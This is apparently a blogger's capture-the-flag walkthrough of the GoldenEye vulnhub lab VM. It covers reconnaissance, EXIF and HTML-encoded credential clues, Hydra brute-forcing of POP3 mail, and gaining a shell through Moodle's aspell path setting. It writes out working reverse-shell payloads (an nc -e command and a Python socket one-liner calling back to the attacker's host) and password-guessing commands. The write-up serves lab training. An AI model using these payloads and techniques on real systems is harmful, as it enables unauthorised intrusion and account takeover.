}==[n33dle]>----: August 2018

Took a while with this one, was only doing a bit here and there when I had the chance.
This one was fun. Some of the intial recon was more puzzle then real-world, but still enjoyable.

Initial compromise was via an exploit in the Moodle web application, then escalated to root through the infamous overlayfs Ubuntu/Linux Kernel exploit.

You can grab this vulnhub machine from here:

https://www.vulnhub.com/entry/goldeneye-1,240/

--> MISSION
The goal is to get root and capture the secret GoldenEye codes - flag.txt.
My target machine IP address is 192.168.111.128

--> REC0N / ENUMERATION
Let's start off with a full port scan:

root@kali:~# nmap -n -v -p- -T4 -sS 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:10 EDT
Initiating ARP Ping Scan at 06:10
Scanning 192.168.111.128 [1 port]
Completed ARP Ping Scan at 06:10, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:10
Scanning 192.168.111.128 [65535 ports]
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:10, 1.69s elapsed (65535 total ports)
Nmap scan report for 192.168.111.128
Host is up (0.00081s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown

And a udp scan using udp-proto-scanner:

root@kali:~# udp-proto-scanner.pl 192.168.111.128
Starting udp-proto-scanner v1.1 ( http://labs.portcullis.co.uk/application/udp-proto-scanner ) on Tue Aug 14 06:13:07 2018

================================================================================
Bandwith: .................... 250k bits/second
Max Probes per host: ......... 3
Config file: ................. /usr/local/bin/udp-proto-scanner.conf
Probes names: ................ DNSStatusRequest,DNSVersionBindReq,NBTStat,NTPRequest,RPCCheck,SNMPv3GetRequest,chargen,citrix,daytime,db2,echo,gtpv1,ike,ms-sql,ms-sql-slam,netop,ntp,rpc,snmp-public,systat,tftp,time,xdmcp
================================================================================

Sending DNSStatusRequest probes to 1 hosts...
Sending DNSVersionBindReq probes to 1 hosts...
Sending NBTStat probes to 1 hosts...
Sending NTPRequest probes to 1 hosts...
Sending RPCCheck probes to 1 hosts...
Sending SNMPv3GetRequest probes to 1 hosts...
Sending chargen probes to 1 hosts...
Sending citrix probes to 1 hosts...
Sending daytime probes to 1 hosts...
Sending db2 probes to 1 hosts...
Sending echo probes to 1 hosts...
Sending gtpv1 probes to 1 hosts...
Sending ike probes to 1 hosts...
Sending ms-sql probes to 1 hosts...
Sending ms-sql-slam probes to 1 hosts...
Sending netop probes to 1 hosts...
Sending ntp probes to 1 hosts...
Sending rpc probes to 1 hosts...
Sending snmp-public probes to 1 hosts...
Sending systat probes to 1 hosts...
Sending tftp probes to 1 hosts...
Sending time probes to 1 hosts...
Sending xdmcp probes to 1 hosts...

Scan complete at Tue Aug 14 06:13:59 2018

I've got tcp/80, tcp/25, tcp/55006 and tcp/55007 to work with.
Let's check out the web page:

Cool little console animation plays. I check the source and the javascript that's running is terminal.js.
This holds something interesting in it's source!

var data = [ { GoldenEyeText: " Severnaya Auxiliary Control Station ****TOP SECRET ACCESS**** Accessing Server Identity Server Name:.................... GOLDENEYE User: UNKNOWN Naviagate to /sev-home/ to login" } ]; // //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes // var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent; var i = 0, isTag, text; (function type() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + ` `; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) return type(); setTimeout(type, 60); })(); }

Whatever this is, it's encoded:
InvincibleHack3&#114

Through google I find it's HTML encoded. I run it through a decoding site which gives me:
InvincibleHack3r

Most likely creds!

So i try username boris and password InvincibleHack3r on http://192.168.111.128/sev-home/

We're in!

Nothing really to look at. So I go back to my nmap scan. This time I run a more aggressive scan on the discovered ports:

root@kali:~# nmap -n -v -p 25,80,55007,55006 -T4 -sS -A 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating Ping Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Completed Ping Scan at 06:36, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:36, 0.06s elapsed (4 total ports)
Initiating Service scan at 06:36
Scanning 4 services on 192.168.111.128
Completed Service scan at 06:36, 31.03s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.128
Initiating Traceroute at 06:36
Completed Traceroute at 06:36, 0.02s elapsed
NSE: Script scanning 192.168.111.128.
Initiating NSE at 06:36
Completed NSE at 06:37, 28.59s elapsed
Initiating NSE at 06:37
Completed NSE at 06:37, 0.01s elapsed
Nmap scan report for 192.168.111.128
Host is up (0.00052s latency).

PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| Hello:
| 220 ubuntu GoldentEye SMTP Electronic-Mail agent
|_ Syntax: EHLO hostname
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA SASL(PLAIN) AUTH-RESP-CODE PIPELINING RESP-CODES UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES UIDL TOP STLS SASL(PLAIN) CAPA USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=8/14%Time=5B72B0A8%P=x86_64-pc-linux-gnu%r(Hell
SF:o,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r
SF:\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X|3.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)

While I'm at it, I check boris and natalya are valid users through the SMTP vrfy function:

root@kali:~# nc -nv 192.168.111.128 25
(UNKNOWN) [192.168.111.128] 25 (smtp) open
EHLO hostname
220 ubuntu GoldentEye SMTP Electronic-Mail agent
250-ubuntu
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy boris
252 2.0.0 boris
vrfy natalya
252 2.0.0 natalya
vrfy doesnotexist
550 5.1.1 <doesnotexist>: Recipient address rejected: User unknown in local recipient table
vrfy bond
550 5.1.1 <bond>: Recipient address rejected: User unknown in local recipient table
vrfy james
550 5.1.1 <james>: Recipient address rejected: User unknown in local recipient table

I also run a nikto scan on the site... hmm nothing exciting:

root@kali:~/Documents/vulnhub/goldeneye# nikto -h http://192.168.111.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.111.128
+ Target Hostname: 192.168.111.128
+ Target Port: 80
+ Start Time: 2018-08-14 06:53:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time: 2018-08-14 06:53:44 (GMT-4) (0 seconds)
---------------------------------------------------------------------------

So I know boris and natalya are valid users. And I can see a pop3 mail system is hosted on tcp/55007. Except I need credentials. The brute-force tool Hydra has a pop3 module. I'll give that a shot with the fasttrack.txt password list. It's a smaller list instead of using the rockyou list.

First I put boris and natalya into a file:

root@kali:~/Documents/vulnhub/goldeneye# echo "boris" > goldeneye-users.txt

root@kali:~/Documents/vulnhub/goldeneye# echo "natalya" >> goldeneye-users.txt

Now I kick off Hydra:

root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-14 07:04:04

[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!

[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task

[DATA] attacking pop3://192.168.111.128:55007/

[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active

[55007][pop3] host: 192.168.111.128 login: boris password: secret1!

[STATUS] 85.00 tries/min, 255 tries in 00:03h, 189 to do in 00:03h, 16 active

[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.

^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

root@kali:~/Documents/vulnhub/goldeneye# hydra -R

[INFORMATION] reading restore file ./hydra.restore

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-14 07:08:11

[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task

[DATA] attacking pop3://192.168.111.128:55007/

[55007][pop3] host: 192.168.111.128 login: natalya password: bird

1 of 1 target successfully completed, 2 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-14 07:09:08

Two successful passwords!

Now let's read their emails (if they have any?!).

See the following if you want to know how to read pop3 emails via telnet/nc:

https://www.pantz.org/software/pop3/pop3telnet.html

root@kali:~# nc 192.168.111.128 55007

+OK GoldenEye POP3 Electronic-Mail System

user boris

+OK

pass secret1!

+OK Logged in.

list

+OK 3 messages:

1 544

2 373

3 921

retr 1

+OK 544 octets

Return-Path: <root@127.0.0.1.goldeneye>

X-Original-To: boris

Delivered-To: boris@ubuntu

Received: from ok (localhost [127.0.0.1])

by ubuntu (Postfix) with SMTP id D9E47454B1

for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)

Message-Id: <20180425022326.D9E47454B1@ubuntu>

Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)

From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

retr 2

+OK 373 octets

Return-Path: <natalya@ubuntu>

X-Original-To: boris

Delivered-To: boris@ubuntu

Received: from ok (localhost [127.0.0.1])

by ubuntu (Postfix) with ESMTP id C3F2B454B1

for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)

Message-Id: <20180425024249.C3F2B454B1@ubuntu>

Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)

From: natalya@ubuntu

Boris, I can break your codes!

retr 3

+OK 921 octets

Return-Path: <alec@janus.boss>

X-Original-To: boris

Delivered-To: boris@ubuntu

Received: from janus (localhost [127.0.0.1])

by ubuntu (Postfix) with ESMTP id 4B9F4454B1

for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)

Message-Id: <20180425025235.4B9F4454B1@ubuntu>

Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)

From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

quit

+OK Logging out.

Perhaps Xenia and admin are valid users?

Lets check Natalya's emails:

root@kali:~# nc 192.168.111.128 55007

+OK GoldenEye POP3 Electronic-Mail System

user natalya

+OK

pass bird

+OK Logged in.

list

+OK 2 messages:

1 631

2 1048

retr 1

+OK 631 octets

Return-Path: <root@ubuntu>

X-Original-To: natalya

Delivered-To: natalya@ubuntu

Received: from ok (localhost [127.0.0.1])

by ubuntu (Postfix) with ESMTP id D5EDA454B1

for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)

Message-Id: <20180425024542.D5EDA454B1@ubuntu>

Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)

From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

retr 2

+OK 1048 octets

Return-Path: <root@ubuntu>

X-Original-To: natalya

Delivered-To: natalya@ubuntu

Received: from root (localhost [127.0.0.1])

by ubuntu (Postfix) with SMTP id 17C96454B1

for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)

Message-Id: <20180425031956.17C96454B1@ubuntu>

Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)

From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia

password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir

**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

quit

+OK Logging out.

Ok, so looks like xenia is a valid user. And some interesting notes here about another internal site.

As we don't have DNS, as per the email, we can add the internal domain hosted on Goldeneye as a host in our hosts file.

First I try using the IP, but as there is a redirect in place it's not possible. So I'll have to add it to my hosts file.

Just use echo and an append output redirect to /etc/hosts:

root@kali:~# echo "192.168.111.128 severnaya-station.com" >> /etc/hosts

Looks like it's working:

root@kali:~# curl severnaya-station.com/gnocertdir

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<title>301 Moved Permanently</title>

</head><body>

<h1>Moved Permanently</h1>

The document has moved <a href="http://severnaya-station.com/gnocertdir/">here</a>.

<hr>

<address>Apache/2.4.7 (Ubuntu) Server at severnaya-station.com Port 80</address>

</body></html>

Hmm what do we have here?!

Site backend looks to be running moodle. As per google "Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License"
Any exploits:

root@kali:~# searchsploit moodle
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit) | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection | exploits/php/webapps/41828.php
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | exploits/php/webapps/28770.txt
Moodle Help Script 1.x - Cross-Site Scripting | exploits/php/webapps/24279.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Just a few :)
Might be some interesting things to try here. RFI and RCE. But first I'll have a look around on the page. I have those xenia creds that'll probably come in use somewhere...
The intro to Goldeneye link takes me to a login page:

The xenia credentials work!

There's a message for Xenia from Dr. Doak. Let's check that out.

Greetings Xenia,

As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

Ok, another username. doak.
I don't have creds, but perhaps I should try adding doak and even the user 'admin' to another hydra attack.
I'll put them into another users file:

root@kali:~/Documents/vulnhub/goldeneye# echo "doak" > goldeneye-users2.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "admin" >> goldeneye-users2.txt

I look around the site. There's nothing in terms of courses/blogs or any other info/intel of use.
Based on the message above, perhaps confirming the xenia account will open up some possibilities?

Kick off another hydra...

root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users2.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-16 22:27:09
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: doak password: goat

Oh wow... that worked. Let's see if there's anything interesting in doak's mail...

root@kali:~/Documents/vulnhub/goldeneye# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.
quit
+OK Logging out.
root@kali:~/Documents/vulnhub/goldeneye#

Sure enough, we have more creds! Lets try and login to the moodle site using these creds.
We're in!

So looking around the site, couldn't find anything, then I came across a folder called 'for james' which contained a s3cret.txt file.

It's contents:

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

So I navigate to that url:

Haha nice. But what do we have here? Perhaps 486 is something? Or maybe the jpeg has some embedded info? Let's see...

Download it:

root@kali:~/Documents/vulnhub/goldeneye# wget http://severnaya-station.com//dir007key/for-007.jpg
--2018-08-16 22:37:28-- http://severnaya-station.com//dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 192.168.111.128
Connecting to severnaya-station.com (severnaya-station.com)|192.168.111.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’

for-007.jpg 100%[===================================================================================================================================================>] 14.55K --.-KB/s in 0s

2018-08-16 22:37:28 (218 MB/s) - ‘for-007.jpg’ saved [14896/14896]

root@kali:~/Documents/vulnhub/goldeneye# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Image Description |eFdpbnRlcjE5OTV4IQ==
Manufacturer |GoldenEye
Resolution Unit |Inch
Software |linux
Artist |For James
YCbCr Positioning |Centered
X-Resolution |72
Y-Resolution |72
Exif Version |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment |For 007
FlashPixVersion |FlashPix Version 1.0
Color Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

Hmmm that image description looks suss! Lets base64 decode it...

root@kali:~/Documents/vulnhub/goldeneye# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!
root@kali:~/Documents/vulnhub/goldeneye#

OK, now that looks like creds to me...
Maybe for the admin user? My hydra completed without finding anything for the admin user. But lets try admin user with these new creds...

Winner winner

There's a bit to look at with admin settings, but I come across a system paths settings, where you can set a path to aspell, du and dot. Looks like you can enter system paths! Googling around, this looks like a known vector of attack for code execution.

I start a listener:

root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...

And I try updating the aspellpath to perform a reverse shell (hoping nc is installed).

sh -c '(nc 192.168.253.130 443 -e /bin/sh &)'

I create a blog post and run spellchecker. Hmm nothing...

Digging further in the settings, looks like the spellchecker is defaulted to use google, rather than a custom spell checker program, as we configured.

Now lets change this to PSpellShell.

So I spent hours, trying all sorts of reverse shell combos with no success. I went through my usual go to list below:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/

Nothing was working. I later released my goldeneye vm was configured to use host only networking and my Kali machine was using a NAT adapter.
This meant I could use my hosts physical adapter to access my internet and also access the goldeneye vm. However, there was not route back for my reverse shell to connect back too.
I changed my Kali machine to a host only adapter, on the same subnet as goldeneye.

My new kali IP is now 192.168.111.129.

Update the aspellshell path:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Hit spell check on a nonsense new blog:

root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.111.129] from severnaya-station.com [192.168.111.128] 48560
/bin/sh: 0: can't access tty; job control turned off
$

BINGO!

--> TIME TO PE
Change over to a python tty shell and see what we're working with...

$ python -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /
cd /
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ uname -ra
uname -ra
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@ubuntu:/$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:2e:e5:d4
inet addr:192.168.111.128 Bcast:192.168.111.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe2e:e5d4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:323 errors:0 dropped:0 overruns:0 frame:0
TX packets:679 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52359 (52.3 KB) TX bytes:1058811 (1.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10760 errors:0 dropped:0 overruns:0 frame:0
TX packets:10760 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6139626 (6.1 MB) TX bytes:6139626 (6.1 MB)

www-data@ubuntu:/$

So Ubuntu 14.04.1 running Linux Kernel 3.13.0-32 64 bit....
I check out the directories in which the site is being hosted.
Looks like I found a new page:

www-data@ubuntu:/var/www/html$ ls -l
ls -l
total 264
drwxr-xr-x 3 www-data www-data 4096 Apr 25 07:29 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
www-data@ubuntu:/var/www/html$ dir 006-final
dir 006-final
sata_drop.webm sata_drop.webm.1 x8vtfinal-flag.gif xvf7-flag
www-data@ubuntu:/var/www/html$

Lets check them in firefox:
Hahaha nice:

Quick look around I don't see anything exciting to move me forward....
What else do we have?

www-data@ubuntu:/var/www/html$ ls -la
ls -la
total 272
drwxr-xr-x 6 root root 4096 Apr 29 10:18 .
drwxr-xr-x 4 root root 4096 Apr 23 20:56 ..
drwxr-xr-x 3 www-data www-data 4096 Aug 16 20:53 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js

Looking at the root I find sniper.jpg...

